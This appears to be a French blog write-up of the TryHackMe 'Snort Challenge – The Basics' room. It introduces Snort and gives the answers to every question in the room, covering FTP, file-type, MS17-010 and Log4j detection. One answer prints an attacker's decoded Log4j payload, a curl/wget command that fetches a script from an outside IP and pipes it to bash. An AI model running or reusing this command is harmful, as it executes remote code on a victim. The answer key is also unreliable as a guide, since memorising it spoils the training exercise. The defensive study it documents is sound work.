Nous avons couvert l'utilisation de Snort pour analyser le trafic FTP et HTTP en créant et en configurant les règles appropriées. Pour appliquer ce que nous avons appris, nous avons analysé des captures de réseau données à l'aide de Snort pour tester les règles créées et détecter les modèles de trafic. Cela faisait partie de Défi TryHackMe Snort – Les bases.

Notes d'étude sur Sniff

Cours complet Splunk SIEM avec scénarios pratiques

Points forts

SNORT est un système de détection et de prévention des intrusions réseau (NIDS/NIPS) open source basé sur des règles. Il a été développé et toujours maintenu par Martin Roesch, des contributeurs open source et l'équipe Cisco Talos. 
Capacités de Snort

  • Analyse du trafic en direct
  • Détection d'attaque et de sonde
  • Journalisation des paquets
  • Analyse du protocole
  • Alerte en temps réel
  • Modules et plugins
  • Pré-processeurs
  • Prise en charge multiplateforme ! (Linux et Windows)

Modes de fonctionnement de Snort IDS

  • Mode renifleur – Lisez les paquets IP et demandez-les dans l'application console.
  • Mode enregistreur de paquets – Enregistrez tous les paquets IP (entrants et sortants) qui visitent le réseau.
  • Modes NIDS et NIPS: Enregistrez/supprimez les paquets jugés malveillants selon les règles définies par l'utilisateur

Réponses de la salle | Snort Challenge – Les bases

Quel est le nombre de paquets détectés ?

Note: Vous devez répondre correctement à cette question avant de répondre au reste des questions de cette tâche.

328

Examinez le fichier journal.

Quelle est l’adresse de destination du paquet 63 ?

145.254.160.237

Examinez le fichier journal.

 Quel est le numéro ACK du paquet 64 ?

0x38AFFFF3

Examinez le fichier journal.

Quel est le numéro SEQ du paquet 62 ?

0x38AFFFF3

W

Examinez le fichier journal.

Quelle est la durée de vie du paquet 65 ?

128

Examinez le fichier journal.

Quelle est l’adresse IP source du paquet 65 ?

145.254.160.237

Examinez le fichier journal.

Quel est le port source du paquet 65 ?

3372

Utilisez le fichier pcap donné.

Écrire des règles pour détecter «tous les ports TCP 21" trafic dans le pcap donné.

Quel est le nombre de paquets détectés ?

614

Examinez le fichier journal.

Quel est le nom du service FTP ?

Service FTP Microsoft

Effacez les fichiers journaux et d’alarmes précédents.

Désactiver/commenter les anciennes règles.

Écrivez une règle pour détecter les tentatives de connexion FTP ayant échoué dans le pcap donné.

Quel est le nombre de paquets détectés ?

41

Effacez les fichiers journaux et d’alarmes précédents.

Désactiver/commenter l'ancienne règle.

Écrivez une règle pour détecter les connexions FTP réussies dans le pcap donné.

Quel est le nombre de paquets détectés ?

1

Effacez les fichiers journaux et d’alarmes précédents.

Désactiver/commenter l'ancienne règle.

Écrire une règle pour détecter les échecs FTP tentatives de connexion avec un nom d'utilisateur valide mais un mauvais mot de passe ou pas de mot de passe.

Quel est le nombre de paquets détectés ?

42

Effacez les fichiers journaux et d’alarmes précédents.

Désactiver/commenter l'ancienne règle.

Écrire une règle pour détecter les échecs FTP tentatives de connexion avec le nom d'utilisateur « Administrateur » mais un mauvais mot de passe ou aucun mot de passe.

Quel est le nombre de paquets détectés ?

7

Accédez au dossier de tâches.

Utilisez le fichier pcap donné.

Écrivez une règle pour détecter le fichier PNG dans le pcap donné.

Examinez les journaux et identifiez le nom du logiciel intégré dans le paquet.

Adobe ImagereadyQ

Effacez les fichiers journaux et d’alarmes précédents.

Désactiver/commenter l'ancienne règle.

Écrivez une règle pour détecter le fichier GIF dans le pcap donné.

Examinez les journaux et identifiez le format d’image intégré dans le paquet.

GIF89a

Accédez au dossier de tâches.

Utilisez le fichier pcap donné.

Écrivez une règle pour détecter le métafichier torrent dans le pcap donné.

 Quel est le nombre de paquets détectés ?

2

Examinez les fichiers journaux/alarmes.

Quel est le nom de l'application torrent ?

bittorrent

Examinez les fichiers journaux/alarmes.

Quel est le type MIME (MultiPurpose Internet Mail Extensions) du métafichier torrent ?

application/x-bittorrent

Examinez les fichiers journaux/alarmes.

Quel est le nom d’hôte du métafichier torrent ?

tracker2.torrentbox.com

Dans cette section, vous devez corriger les erreurs de syntaxe dans les fichiers de règles donnés. 

Vous pouvez tester chaque ensemble de règles avec la structure de commande suivante :

sudo snort -c local-X.rules -r mx-1.pcap -A console

Corrigez l'erreur de syntaxe dans le fichier local-1.rules et faites-le fonctionner correctement.

Quel est le nombre de paquets détectés ?

16

Corrigez l'erreur de syntaxe dans le fichier local-2.rules et faites-le fonctionner correctement.

Quel est le nombre de paquets détectés ?

68

Corrigez l'erreur de syntaxe dans le fichier local-3.rules et faites-le fonctionner correctement.

Quel est le nombre de paquets détectés ?

87

Corrigez l'erreur de syntaxe dans le fichier local-4.rules et faites-le fonctionner correctement.

Quel est le nombre de paquets détectés ?

90

Corrigez l'erreur de syntaxe dans le fichier local-5.rules et faites-le fonctionner correctement.

Quel est le nombre de paquets détectés ?

155

Corrigez l'erreur logique dans le fichier local-6.rules et faites en sorte qu'il fonctionne correctement pour créer des alertes.

Quel est le nombre de paquets détectés ?

2

Corrigez l'erreur logique dans le fichier local-7.rules et faites en sorte qu'il fonctionne correctement pour créer des alertes.

Quel est le nom de l'option requise :

message

Accédez au dossier de tâches.

Utilisez le fichier pcap donné.

Utilisez le fichier de règles donné (local.rules) pour enquêter sur l'exploitation de ms1710.

Quel est le nombre de paquets détectés ?

25154

Effacez les fichiers journaux et d’alarmes précédents.

Utilisez le fichier vide local-1.rules pour écrire une nouvelle règle afin de détecter les charges utiles contenant le mot-clé « \IPC$ ».

Quel est le nombre de paquets détectés ?

12

Examinez les fichiers journaux/alarmes.

Quoi est le chemin demandé ?

\192.168.116.138\IPC$

Quel est le score CVSS v2 de la vulnérabilité MS17-010 ?

9.3

Utilisez le fichier pcap donné.

Utilisez le fichier de règles donné (local.rules) pour enquêter sur l'exploitation de log4j.

Quel est le nombre de paquets détectés ?

26

Examinez les fichiers journaux/alarmes.

Combien de règles ont été déclenchées ?

4

Examinez les fichiers journaux/alarmes.

Quels sont les six premiers chiffres des côtés de la règle déclenchée ?

210037

Effacez les fichiers journaux et d’alarmes précédents.

Utilisez le fichier vide local-1.rules pour écrire une nouvelle règle afin de détecter les charges utiles des paquets entre 770 et 855 octets.

Quel est le nombre de paquets détectés ?

41

Examinez les fichiers journaux/alarmes.

Quoi est le nom de l'algorithme d'encodage utilisé ?

base64

Examinez les fichiers journaux/alarmes.

Quoi est l'ID IP du paquet correspondant ?

62808

Examinez les fichiers journaux/alarmes.

Décodez la commande codée.

Quel est le commandement de l'attaquant ?

(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash

Quel est le score CVSS v2 de la vulnérabilité Log4j ?

9.3

Présentation vidéo | Défi TryHackMe Snort – Les bases

, , ,
Montrer les Commentaires

Motasem

A propos de l'Auteur

Je crée des notes de cybersécurité, des notes de marketing numérique et des cours en ligne. Je fournis également des conseils en marketing numérique, y compris, mais sans s'y limiter, le référencement, les publicités Google et Meta et l'administration CRM.

Voir les Articles